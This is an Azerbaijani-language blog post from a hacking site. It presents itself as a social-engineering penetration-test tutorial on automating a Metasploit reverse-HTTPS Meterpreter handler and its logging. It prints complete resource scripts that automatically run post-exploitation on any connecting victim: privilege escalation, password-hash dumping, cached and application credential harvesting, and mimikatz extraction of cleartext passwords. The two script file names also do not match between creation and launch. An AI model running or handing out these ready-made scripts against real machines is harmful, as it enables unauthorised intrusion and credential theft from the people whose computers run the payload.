Blackhat.az

Loading...

Blackhat.az

Register

Cyber Security - Hacking - Pentest - Hacking Operating Systems - Hacking tools - Password cracking - Security fundamentals - Social engineering - 11 March 2021

Sosial Mühəndislik Penetrasiya Testlərində Avtomatik Çalışma Ssenarilərindən Istifadə Və Qeydlərin Təhlili

Sosial mühəndislik hücumlarındakı əsas problemlərdən biri zərər çəkmiş şəxsin zərərli tətbiqetmənin nə vaxt icra ediləcəyini bilməməsidir. Bu səbəbdən konsolun qarşısında gözləmək çox praktik deyil. Bu, skriptlərlə MSF exploit / multi / handler modulundan istifadə edən sosial mühəndislik hücumlarında vacibdir. Skriptləri istifadə etməklə yanaşı, giriş mühəndisliyi nüfuzetmə testlərində də nüfuz testlərinin nəticələrini bildirmək və hücum nəticəsində əldə edilən məlumatların siyahısını vermək üçün vacibdir. Bu yazıda, nüfuzetmə testləri üçün avtomatik olaraq işləyən skriptlərin, xüsusən də sosial mühəndislik nüfuzetmə testlərinin hazırlanması və bu skriptlərin istifadəsi, istismarın sonundakı hücumu təhlil etmək üçün jurnalların konfiqurasiyası məsələsini araşdıracağıq.

Bu yazıda, sosial mühəndislik üçün yaradılan zərərli proqramın qurban kompüterinə göndərildiyini fərz etsək, MSF multi / handler modulu konfiqurasiya ediləcək və hücum nəticələri araşdırılacaq. Bu əməliyyatlar 3 mərhələdə həyata keçiriləcəkdir.

  • MSF multi / handler moduluna başlayacaq olan “MultiHandlerinBaslatilmasi.rc” adlı skript və Meterpreter qabığının alınmasından sonra işləyən əmrləri ehtiva edən “SosyalMuhendislik_MeterpreterKomutlari.rc” adlı skript hazırlanacaq.
  • MSF multi / handler modulu işə salınacaq və zərər çəkmiş şəxs tərəfindən idarə olunan zərərli tətbiqetmənin sayğacla əlaqəsi əldə ediləcəkdir.
  • Qurban tərəfindən idarə olunan zərərli tətbiqetmənin nəticələri MSF əmr sətrindən və qeydlərdən araşdırılacaq.

 

1) Senarilərin hazırlanması

Hər şeydən əvvəl, bir qovluqda MultiHandlerinBaslatilmasi.rc adlı bir skript yaradılır (/ root / Desktop / kimi) və modulun iş parametrləri aşağıda göstərilən əmrləri daxil edərək verilir.

spool /root/Desktop/Log.log
set PROMPT %red%L %yel%H %blu%U %whi%T
set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimestampOutput true
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.16.67.120
set LPORT 443
set VERBOSE true
set ExitOnSession false
set SessionCommunicationTimeout 3000
set SessionExpirationTimeout 1209600
set AutoRunScript multi_console_command -rc /root/Desktop/SosyalMuhendislik_MeterpreterKomutlari.rc
exploit -j

 

Yuxarıdakı əmrlərin funksiyaları qısaca aşağıdakı kimidir:

  • Log.log faylı masaüstündə yaradılır və işləyən əmrlərin nəticələri bu fayla yazdırılır.
  • Konsolda təcavüzkarın kompüterinin bəzi məlumatlarını (IP / kompüter adı / hesab adı / tarix) daxil etmək təmin edilir.
  • Günlüklər aktivdir.
  • MSF multi / handler modulu işə salındı.
  • “ExitOnSession” seçimi ilə bir seans əldə edildikdən sonra modul gələn tələbləri qəbul etməyə davam edir.
  • Sessiya üçün fasilələr təyin edilmişdir.
  • Ən vacib maddələrdən biri olaraq, “AutoRunScript” parametri, sessiyadan sonra yerinə yetiriləcək əmrlərin ssenarisini müəyyənləşdirir.

MSF multi / handler modulu tərəfindən çağırılacaq skript (SosyalMuhendislik_MeterpreterKomutlari.rc) aşağıdakı kimi qurula bilər:

sysinfo
getsystem
ifconfig
netstat
ps
run hashdump
run post/windows/manage/smart_migrate
run checkvm
run post/windows/gather/cachedump
run post/windows/gather/dumplinks
run post/windows/gather/credentials/gpp
run post/windows/gather/checkvm
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/winscp
load mimikatz
wdigest

Yuxarıdakı əmrlərin funksiyaları qısaca aşağıdakı kimidir:

  • Qurbanın kompüterinin əməliyyat sistemi, IP ünvanı, şəbəkədəki ani trafik və hazırda işləyən proseslər kimi əsas məlumatlar əldə edilir.
  • Kompüterdəki yerli hesablar üçün parol xülasələri əldə edilir.
  • Explorer.exe kimi daha sabit bir prosesə atılır.
  • Kompüterin virtual maşın və ya fiziki maşın olub olmadığı yoxlanılır.
  • Bəzi kritik məlumatlar tətbiqlərdən və ya diskdən axtarılır.
  • Parolların aydın vəziyyəti kompüterin operativ yaddaşından əldə edilir.

Bu 2 skript faylı masaüstündə qeyd edildi:

2) Modulu işə salmaq və zərərli proqramı işə salmaq

Msfconsole alətinin “-r” parametri MSF modulunu işə salmaq üçün istifadə edilə bilər. Beləliklə, modul “MultiHandlerinBaslatilmasi.rc” adlı skript sənədindəki konfiqurasiya parametrlərinə uyğun olaraq işə salınır.

msfconsole -r /root/Desktop/MultiHandlerInitialization.rc

Modul konfiqurasiya edildikdən sonra göndərilən zərərli tətbiqin işləməsi gözlənilir.

Qeyd: Zərərli tətbiqetmənin yaradılması barədə ətraflı məlumat üçün baxın .

Zərərli proqram işlədikdə, MSF konsolundakı “AutoRunScript” parametrində göstərilən skriptdəki (SosyalMuhendislik_MeterpreterKomutlari.rc) əmrlər işə başlayır:

3) Günlüklərin yoxlanılması

Ən vacib günlük faylı masaüstündə meydana gələn Log.log sənədidir.

Bu fayl MSF modulu işə salındıqdan sonra konsolda baş verən hər bir əməliyyatın qeydini ehtiva edir:

Daha çox:

Əlavə olaraq, sessiya gündəliyi aktiv olduğundan, /root/.msf4/logs/sessions qovluğu altında tarix və kompüter adı ilə yaradılan bir faylda yalnız sessiya ilə əlaqəli qeydlər var: